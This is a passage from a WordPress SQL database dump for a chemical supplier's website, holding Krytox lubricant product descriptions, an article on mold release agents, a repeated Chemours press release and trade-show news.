href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-09 18:54:33', '2016-11-09 18:54:33', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2982, 3, '2016-11-09 20:26:54', '2016-11-09 20:26:54', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed.PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/"><strong>Thermoset polysiloxanes</strong></a>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-09 20:26:54', '2016-11-09 20:26:54', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2983, 0, '2016-11-09 22:49:44', '2016-11-09 22:49:44', '', '', '', 'publish', 'closed', 'closed', '', '2983', '', '', '2016-11-09 22:49:45', '2016-11-09 22:49:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/2983/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2984, 0, '2016-11-10 10:02:32', '2016-11-10 10:02:32', '', '', '', 'publish', 'closed', 'closed', '', '2984', '', '', '2016-11-10 10:02:32', '2016-11-10 10:02:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/2984/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2985, 155, '2016-11-10 11:16:31', '2016-11-10 11:16:31', '', '', '', 'publish', 'closed', 'closed', '', '2985', '', '', '2016-11-10 11:16:32', '2016-11-10 11:16:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/2985/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2986, 0, '2016-11-10 13:59:56', '2016-11-10 13:59:56', '', '', '', 'publish', 'closed', 'closed', '', '2986', '', '', '2016-11-10 13:59:57', '2016-11-10 13:59:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/2986/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2987, 0, '2016-11-10 14:34:02', '2016-11-10 14:34:02', '', '', '', 'publish', 'closed', 'closed', '', '2987', '', '', '2016-11-10 14:34:03', '2016-11-10 14:34:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/2987/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2988, 156, '2016-11-10 15:06:56', '2016-11-10 15:06:56', '', '', '', 'publish', 'closed', 'closed', '', '2988', '', '', '2016-11-10 15:06:57', '2016-11-10 15:06:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/2988/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2989, 2, '2016-11-10 15:26:08', '2016-11-10 15:26:08', '<h1><strong>Chemours Introduces Krytox™ FPG 028 Performance Lubricant</strong></h1>\r\n<h4><strong>Designed for use in military and commercial aircraft and supporting equipment.</strong></h4>\r\nWilmington, Del., November 10, 2016 – The Chemours Company (“Chemours”) (NYSE: CC), a global chemistry company with leading market positions in titanium technologies, fluoroproducts and chemical solutions, announced today the introduction of its new <a href="https://www.miller-stephenson.com/product/krytox-fpg-028/">Krytox™</a> FPG 028 performance lubricant designed for use in aircraft and supporting equipment. Krytox™ FPG 028 is MIL-PRF-27617 TYPE IV specified and has AFPET/PTPT approval.\r\n\r\nKrytox™ FPG 028 is a smooth, buttery, perfluoropolyether (PFPE)-based white grease thickened with a special, high-performance polytetrafluoroethylene (PTFE) thickener. It was developed to operate over a wide temperature range (–73 to 204 °C; –99 to 399 °F)) and to be resistant to hydrocarbon fuel, liquid oxygen and a variety of other chemicals. Krytox™ FPG 028 operates well under severe conditions and can be used for bearings and gears, and as a lubricant for O-rings and elastomers. The Department of Defense’s Defense Logistics Agency (DLA) has assigned Commercial and Government Entity (CAGE) Code 7GFT8 to The Chemours Company.\r\n\r\n“Our Krytox™ industrial lubricants have been developed with some of the world’s most demanding mechanical applications in mind,” said Jennifer Bricker, Global Product Manager. “With its superior performance in extreme conditions and exceptional longevity, Krytox™ FPG 028 is ideal for a variety of military and commercial aircraft. It is a welcome addition to our portfolio of formulated greases for safety, reliability and reduced maintenance.”\r\n\r\nAvailable in 50 and 100g syringes, 8 oz. tubes, and 1.76 lb. cartridges.\r\n\r\n[ux_product_categories ids="160" number="10"]', 'Introducing Krytox™ FPG 028 Performance Lubricant', '', 'publish', 'closed', 'closed', '', 'krytox-fpg-028-performance-lubricant', '', '', '2016-11-10 15:27:44', '2016-11-10 15:27:44', '', 0, 'https://www.miller-stephenson.com/?p=2989', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2990, 2, '2016-11-10 15:24:56', '2016-11-10 15:24:56', '', 'Krytox FPG 028', '', 'inherit', 'closed', 'closed', '', 'shutterstock_106646615', '', '', '2016-11-10 15:25:08', '2016-11-10 15:25:08', '', 2989, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_106646615.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2991, 2, '2016-11-10 15:26:08', '2016-11-10 15:26:08', '<h1><strong>Chemours Introduces Krytox™ FPG 028 Performance Lubricant</strong></h1>\r\n<h4><strong>Designed for use in military and commercial aircraft and supporting equipment.</strong></h4>\r\nWilmington, Del., November 10, 2016 – The Chemours Company (“Chemours”) (NYSE: CC), a global chemistry company with leading market positions in titanium technologies, fluoroproducts and chemical solutions, announced today the introduction of its new <a href="https://www.miller-stephenson.com/product/krytox-fpg-028/">Krytox™</a> FPG 028 performance lubricant designed for use in aircraft and supporting equipment. Krytox™ FPG 028 is MIL-PRF-27617 TYPE IV specified and has AFPET/PTPT approval.\r\n\r\nKrytox™ FPG 028 is a smooth, buttery, perfluoropolyether (PFPE)-based white grease thickened with a special, high-performance polytetrafluoroethylene (PTFE) thickener. It was developed to operate over a wide temperature range (–73 to 204 °C; –99 to 399 °F)) and to be resistant to hydrocarbon fuel, liquid oxygen and a variety of other chemicals. Krytox™ FPG 028 operates well under severe conditions and can be used for bearings and gears, and as a lubricant for O-rings and elastomers. The Department of Defense’s Defense Logistics Agency (DLA) has assigned Commercial and Government Entity (CAGE) Code 7GFT8 to The Chemours Company.\r\n\r\n“Our Krytox™ industrial lubricants have been developed with some of the world’s most demanding mechanical applications in mind,” said Jennifer Bricker, Global Product Manager. “With its superior performance in extreme conditions and exceptional longevity, Krytox™ FPG 028 is ideal for a variety of military and commercial aircraft. It is a welcome addition to our portfolio of formulated greases for safety, reliability and reduced maintenance.”\r\n\r\nAvailable in 50 and 100g syringes, 8 oz. tubes, and 1.76 lb. cartridges.\r\n[ux_product_categories number="10" parent="0" columns="4" title="FPG Greases" ]', 'Introducing Krytox™ FPG 028 Performance Lubricant', '', 'inherit', 'closed', 'closed', '', '2989-revision-v1', '', '', '2016-11-10 15:26:08', '2016-11-10 15:26:08', '', 2989, 'https://www.miller-stephenson.com/2989-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2992, 2, '2016-11-10 15:26:57', '2016-11-10 15:26:57', '<h1><strong>Chemours Introduces Krytox™ FPG 028 Performance Lubricant</strong></h1>\n<h4><strong>Designed for use in military and commercial aircraft and supporting equipment.</strong></h4>\n<p>Wilmington, Del., November 10, 2016 – The Chemours Company (“Chemours”) (NYSE: CC), a global chemistry company with leading market positions in titanium technologies, fluoroproducts and chemical solutions, announced today the introduction of its new <a href="https://www.miller-stephenson.com/product/krytox-fpg-028/">Krytox™</a> FPG 028 performance lubricant designed for use in aircraft and supporting equipment. Krytox™ FPG 028 is MIL-PRF-27617 TYPE IV specified and has AFPET/PTPT approval.</p>\n<p>Krytox™ FPG 028 is a smooth, buttery, perfluoropolyether (PFPE)-based white grease thickened with a special, high-performance polytetrafluoroethylene (PTFE) thickener. It was developed to operate over a wide temperature range (–73 to 204 °C; –99 to 399 °F)) and to be resistant to hydrocarbon fuel, liquid oxygen and a variety of other chemicals. Krytox™ FPG 028 operates well under severe conditions and can be used for bearings and gears, and as a lubricant for O-rings and elastomers. The Department of Defense’s Defense Logistics Agency (DLA) has assigned Commercial and Government Entity (CAGE) Code 7GFT8 to The Chemours Company.</p>\n<p>“Our Krytox™ industrial lubricants have been developed with some of the world’s most demanding mechanical applications in mind,” said Jennifer Bricker, Global Product Manager. “With its superior performance in extreme conditions and exceptional longevity, Krytox™ FPG 028 is ideal for a variety of military and commercial aircraft. It is a welcome addition to our portfolio of formulated greases for safety, reliability and reduced maintenance.”</p>\n<p>Available in 50 and 100g syringes, 8 oz. tubes, and 1.76 lb. cartridges.</p>\n[ux_product_categories ids="160" number="10"]', 'Introducing Krytox™ FPG 028 Performance Lubricant', '', 'inherit', 'closed', 'closed', '', '2989-revision-v1', '', '', '2016-11-10 15:26:57', '2016-11-10 15:26:57', '', 2989, 'https://www.miller-stephenson.com/2989-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2993, 2, '2016-11-10 15:27:44', '2016-11-10 15:27:44', '<h1><strong>Chemours Introduces Krytox™ FPG 028 Performance Lubricant</strong></h1>\r\n<h4><strong>Designed for use in military and commercial aircraft and supporting equipment.</strong></h4>\r\nWilmington, Del., November 10, 2016 – The Chemours Company (“Chemours”) (NYSE: CC), a global chemistry company with leading market positions in titanium technologies, fluoroproducts and chemical solutions, announced today the introduction of its new <a href="https://www.miller-stephenson.com/product/krytox-fpg-028/">Krytox™</a> FPG 028 performance lubricant designed for use in aircraft and supporting equipment. Krytox™ FPG 028 is MIL-PRF-27617 TYPE IV specified and has AFPET/PTPT approval.\r\n\r\nKrytox™ FPG 028 is a smooth, buttery, perfluoropolyether (PFPE)-based white grease thickened with a special, high-performance polytetrafluoroethylene (PTFE) thickener. It was developed to operate over a wide temperature range (–73 to 204 °C; –99 to 399 °F)) and to be resistant to hydrocarbon fuel, liquid oxygen and a variety of other chemicals. Krytox™ FPG 028 operates well under severe conditions and can be used for bearings and gears, and as a lubricant for O-rings and elastomers. The Department of Defense’s Defense Logistics Agency (DLA) has assigned Commercial and Government Entity (CAGE) Code 7GFT8 to The Chemours Company.\r\n\r\n“Our Krytox™ industrial lubricants have been developed with some of the world’s most demanding mechanical applications in mind,” said Jennifer Bricker, Global Product Manager. “With its superior performance in extreme conditions and exceptional longevity, Krytox™ FPG 028 is ideal for a variety of military and commercial aircraft. It is a welcome addition to our portfolio of formulated greases for safety, reliability and reduced maintenance.”\r\n\r\nAvailable in 50 and 100g syringes, 8 oz. tubes, and 1.76 lb. cartridges.\r\n\r\n[ux_product_categories ids="160" number="10"]', 'Introducing Krytox™ FPG 028 Performance Lubricant', '', 'inherit', 'closed', 'closed', '', '2989-revision-v1', '', '', '2016-11-10 15:27:44', '2016-11-10 15:27:44', '', 2989, 'https://www.miller-stephenson.com/2989-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2994, 2, '2017-05-02 19:40:15', '2017-05-02 19:40:15', '[row]\n\n[col span="3"]\n<h3>Upcoming Trade Shows</h3>\n[/col]\n[col span="6"]\n\nSAMPE - Seattle 2017\n\nDate: May 22-25, 2017\n\nMiller-Stephenson will be exhibiting at the SAMPE 2017 show in Seattle. Learn more about how <a href="https://www.miller-stephenson.com/krytox/">Krytox</a> and Release Agents can help advance your technology.\n\n&nbsp;\n\n[/col]\n[col span="3"]\n\n[ux_image id="50"]\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n<h3>Miller-Stephenson &amp; Chemours Official Channel Partners</h3>\n[/col]\n[col span="6"]\n\nAs you may have already heard, Dupont\'s Performance Chemicals business, which includes the Titanium Technologies and Chemicals &amp; Fluoroproducts business began operating as a separate company known as The Chemours Company ("Chemours™"), a wholly owned subsidiary of DuPont, as of January 1, 2015.\n\nMiller-Stephenson would like to take this opportunity to congratulate Chemours™ on becoming an officially new, stand-alone Company with a 200-year-old legacy, a portfolio of market-shaping products and a renewed commitment to their customers.\n\nChemours™ changeover to a stand-alone Company will not affect the manufacturing of their products, lead times or order conditions. Krytox, Vertrel® and DryFilm® are some of the Product lines that will transition from DuPont to Chemours™.\n\n[/col]\n[col span="3"]\n\n[ux_image id="200"]\n\n[/col]\n\n[/row]', 'News', '', 'inherit', 'closed', 'closed', '', '118-autosave-v1', '', '', '2017-05-02 19:40:15', '2017-05-02 19:40:15', '', 118, 'https://www.miller-stephenson.com/118-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2995, 2, '2016-11-10 15:31:42', '2016-11-10 15:31:42', '[row]\r\n\r\n[col span="3"]\r\n<h3>Upcoming Trade Shows</h3>\r\n[/col]\r\n[col span="6"]\r\n\r\nMDM West - Anaheim, CA - Booth 1977\r\n\r\nDate: February 7- 9 2017\r\n\r\nMiller-Stephenson will be exhibiting at the MDM west - Anaheim show on February 7 - 9 2017. Miller-Stephenson\'s new medical division will be making an appearance. Learn more about our Medical line of products <a href="https://www.miller-stephenson.com/chemicals/medical-chemicals/">here</a>.\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="50"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n<h3>Miller-Stephenson &amp; Chemours Official Channel Partners</h3>\r\n[/col]\r\n[col span="6"]\r\n\r\nAs you may have already heard, Dupont\'s Performance Chemicals business, which includes the Titanium Technologies and Chemicals &amp; Fluoroproducts business began operating as a separate company known as The Chemours Company ("Chemours™"), a wholly owned subsidiary of DuPont, as of January 1, 2015.\r\n\r\nMiller-Stephenson would like to take this opportunity to congratulate Chemours™ on becoming an officially new, stand-alone Company with a 200-year-old legacy, a portfolio of market-shaping products and a renewed commitment to their customers.\r\n\r\nChemours™ changeover to a stand-alone Company will not affect the manufacturing of their products, lead times or order conditions. Krytox, Vertrel® and DryFilm® are some of the Product lines that will transition from DuPont to Chemours™.\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="200"]\r\n\r\n[/col]\r\n\r\n[/row]', 'News', '', 'inherit', 'closed', 'closed', '', '118-revision-v1', '', '', '2016-11-10 15:31:42', '2016-11-10 15:31:42', '', 118, 'https://www.miller-stephenson.com/118-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2996, 157, '2016-11-10 16:13:25', '2016-11-10 16:13:25', '', '', '', 'publish', 'closed', 'closed', '', '2996', '', '', '2016-11-10 16:13:25', '2016-11-10 16:13:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/2996/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2997, 3, '2016-11-10 17:41:35', '2016-11-10 17:41:35', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Mold Release Agents for Polyurethane Molding</h1>\r\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research, development and technical expertise.  Our mold release agents are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 105%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" 